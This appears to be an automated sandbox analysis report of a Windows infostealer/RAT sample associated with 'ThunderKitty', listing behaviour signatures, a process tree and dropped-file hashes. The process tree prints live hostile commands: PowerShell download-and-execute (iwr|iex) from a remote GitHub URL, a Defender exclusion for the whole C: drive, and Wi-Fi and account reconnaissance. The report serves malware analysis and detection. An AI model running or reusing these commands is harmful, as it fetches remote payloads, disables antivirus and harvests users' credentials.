Analysis

  • max time kernel
    147s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 22:21

General

  • Target

    2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    1efbe434510bf569394240170f3b2870

  • SHA1

    f5169fff34809dc7c9438cabe91b8940c70f7b45

  • SHA256

    8df56196a7e447f592195adc3732a0fc709bd2b4c5b26ef7ea38175803ae3a12

  • SHA512

    e52539c324ef42b6e522c5f872be66c0114b0382b6de613b9dfbfcf58f996347cb9c9b3071a2aecc1ede4a79d86fd9698f5047ad1ab2a0aefb59291b36e5e8e5

  • SSDEEP

    98304:jFzji0rxnPrr9G2VsLAfmQ0VEjp90RTFh1vkMcFJqEFnIV0PvrIIKJu4ahDXFNkW:Be0rxnAemmdRbIV2v14AFmA/NGaX

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Looks for VMWare drivers on disk 2 TTPs 2 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-25_1efbe434510bf569394240170f3b2870_poet-rat_snatch.exe"
    1⤵
    • Looks for VirtualBox drivers on disk
    • Looks for VMWare drivers on disk
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2976
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr1elz5x\mr1elz5x.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2960
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES953B.tmp" "c:\Users\Admin\AppData\Local\Temp\mr1elz5x\CSCEE0AB313998A49A5A0C7AF4E321C8B13.TMP"
          4⤵
            PID:2832
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:4488
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4492
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:4024
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:3328
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:2900
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3340
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:3344
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:4336
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1416
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:1520
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:4908
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:3252
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:2216
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:2260
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:3316
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:4644
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:1596
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /c start facebook.com
                      2⤵
                        PID:1144
                      • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                        PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3816
                      • C:\Windows\system32\cmd.exe
                        cmd /c rundll32.exe user32.dll,SwapMouseButton
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4348
                        • C:\Windows\system32\rundll32.exe
                          rundll32.exe user32.dll,SwapMouseButton
                          3⤵
                            PID:1928
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                          2⤵
                          • Views/modifies file attributes
                          PID:3892
                        • C:\Windows\system32\taskkill.exe
                          taskkill /F /IM wallpaper32.exe
                          2⤵
                          • Kills process with taskkill
                          PID:2708
                      • C:\Windows\system32\AUDIODG.EXE
                        C:\Windows\system32\AUDIODG.EXE 0x52c 0x524
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4428

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        d85ba6ff808d9e5444a4b369f5bc2730

                        SHA1

                        31aa9d96590fff6981b315e0b391b575e4c0804a

                        SHA256

                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                        SHA512

                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        23aba7e7ecd37fd9f076dbd4d6e981e2

                        SHA1

                        40150b7db90f125b7b1c7cae65250f3a13a5bbb3

                        SHA256

                        a67ce8b05ec37c76167b8769946b840cee681b0c3a19b8d7c56835ad21221b12

                        SHA512

                        fce8455921832c8960e1aa783091b83fe17aa885b0a86e92d2ada35c76bfc79122d90b0260f6571018d7317ffee0c3bedc7f0bbf4d21a41e77d02e25892d3c9a

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        826ca040e1f9e84acd20f789d81903f6

                        SHA1

                        4d997b017a5cbf868011df6623793770c86a377b

                        SHA256

                        eb551c927c34363036e8e2186ff9c7693d0271165358972cf5342f22499fe62a

                        SHA512

                        9a013fc1302ce4eeb2781b237c32070ed3008bdb85ab6310eed4064558a2547cf677faeb366a6da112c3d06d53ab83c1693c5c27b6aee8284503ce80c62ab660

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        579c6e465a86fb413710d47da4b10497

                        SHA1

                        a96f55236f30297eff9607d3e7bc9bd961c14c12

                        SHA256

                        03d3318153697f41a5756f7e9e3fe0769e3aa3ccf93c40bc2e795f7417f1cc20

                        SHA512

                        a29f19af9975be5423a32b06b5bea5908e072f5179389ede43354395490fabc486341b9e231615968bb20dc85c50cbf283705fedd6353a271572eb84258af69c

                      • C:\Users\Admin\AppData\Local\Temp\RES953B.tmp

                        Filesize

                        1KB

                        MD5

                        f239636b7e7f9f12f67a6a06286d9d41

                        SHA1

                        b1386944e63b5fe19ac7443c7d4ed1beafec0f8a

                        SHA256

                        e23e544537e84c80e908b0c35042a2ffacf5d9b0b287565b426df7a297170b94

                        SHA512

                        0c25785ff225e4fb1f482935338912acbd8ee8a09a807da6040940782327350dddb712673cec648499543b681685d6e037cba9ec8218a99c2fb908b960cd8e3b

                      • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                        Filesize

                        248KB

                        MD5

                        73fdfd8142a50d8f45d8d42d897ae3aa

                        SHA1

                        eaef82c9067d3d5ff2bfe3aff58e7165eaa6c35e

                        SHA256

                        b736a60a21e84db7ab2c6ffe905802b3eccf2ca082e95f606af838a6c4fa93bd

                        SHA512

                        f8cb10a8cfd3c741035fcfc11005a40565da7dfcb5448a79de2bd7bd4dfd6ce5fc21cc0abd8b43a363f57b87d06376723760bfb6fceeade11a0eb6de905eaee0

                      • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                        Filesize

                        23KB

                        MD5

                        d9e710c5f3ffa3e8fb7a87ac07c565b7

                        SHA1

                        b5cdb10dd6e58e43c41f1aa337d6a96d6e3dca7d

                        SHA256

                        fc71c949bd6e90d09cf3459568c72a4cec61511105d75d085578b0fa560b34c3

                        SHA512

                        9cc3a3eb080e61a913eb84f9112b281fbd2765c59c0e76e05b6b099302bddc284f5dece72f8dcb26cd7d44b0db79164720e96f70bc6486c424bbf4c2200dfe7c

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u5thzjgk.05o.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\mr1elz5x\mr1elz5x.dll

                        Filesize

                        4KB

                        MD5

                        afc070a1a1463f72087236499f41bcc5

                        SHA1

                        bf63e79eb1b6b52c5bfa12f090e5037479926901

                        SHA256

                        7695696a5e7c6069879a385ffa9a27e5d757b6022b2999f22d26003dbd7af728

                        SHA512

                        4c131493b2593c284a693a97e5344fc3680637d35f405f07902ac245f94a1d2b377ba5135a2c9e9f50364f29766f3d40bcdd174ba05ebdbae9fb279fa5c5b201

                      • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                        Filesize

                        2KB

                        MD5

                        9758656bbe8589c66bb241b052490c72

                        SHA1

                        b73da83fb3ae6b86c6365769a04de9845d5c602c

                        SHA256

                        e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                        SHA512

                        da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                      • \??\c:\Users\Admin\AppData\Local\Temp\mr1elz5x\CSCEE0AB313998A49A5A0C7AF4E321C8B13.TMP

                        Filesize

                        652B

                        MD5

                        69089bd322392d9b10d1f9c854a56fb7

                        SHA1

                        45eb1c427d0fb60b44ed3409d629ad4f563b7644

                        SHA256

                        54473e99dd04b0b0253843511b9d4df6ee87ca287fe7cfda639ed90b164cec2d

                        SHA512

                        dc3fa1a2681631d05850591350cc1f067b61d28dcbe426712fe0dc099fbe54820735d932f7f3a5e317327f93fcf3214844d22326175bbd9798606bbf3a756cf8

                      • \??\c:\Users\Admin\AppData\Local\Temp\mr1elz5x\mr1elz5x.0.cs

                        Filesize

                        1KB

                        MD5

                        8a1e7edb2117ec5dde9a07016905923b

                        SHA1

                        0155dbeeb16333e2eaa767b0209750efee56f47f

                        SHA256

                        c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                        SHA512

                        4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                      • \??\c:\Users\Admin\AppData\Local\Temp\mr1elz5x\mr1elz5x.cmdline

                        Filesize

                        369B

                        MD5

                        89d6f393dede3bca1370018aa5f16558

                        SHA1

                        6cf4ea9a6b108a8568c5a38dced41050d1019803

                        SHA256

                        0419f5a2ea2585ee8030cc7cc476b00ce5ed342a6102cd053a2e581146019e75

                        SHA512

                        8ee6d0eaee37c427cf0ee7f77a28073e5ec99e7c3a23c002cb766a96347f59f5a0f343f24ad946e2202e7d6b183fe886195b091a91a47ae436a6ddd2e92e03f4

                      • memory/840-23-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/840-50-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/840-24-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/840-0-0x00007FF9E6273000-0x00007FF9E6275000-memory.dmp

                        Filesize

                        8KB

                      • memory/2976-79-0x0000024B567A0000-0x0000024B567C4000-memory.dmp

                        Filesize

                        144KB

                      • memory/2976-78-0x0000024B567A0000-0x0000024B567CA000-memory.dmp

                        Filesize

                        168KB

                      • memory/2976-62-0x0000024B3DB60000-0x0000024B3DB68000-memory.dmp

                        Filesize

                        32KB

                      • memory/2976-114-0x0000024B56790000-0x0000024B567A2000-memory.dmp

                        Filesize

                        72KB

                      • memory/2976-115-0x0000024B56770000-0x0000024B5677A000-memory.dmp

                        Filesize

                        40KB

                      • memory/4104-67-0x000002B91DED0000-0x000002B91E676000-memory.dmp

                        Filesize

                        7.6MB

                      • memory/4104-74-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4104-21-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4104-34-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4104-7-0x000002B904E60000-0x000002B904E82000-memory.dmp

                        Filesize

                        136KB

                      • memory/4104-1-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

                        Filesize

                        10.8MB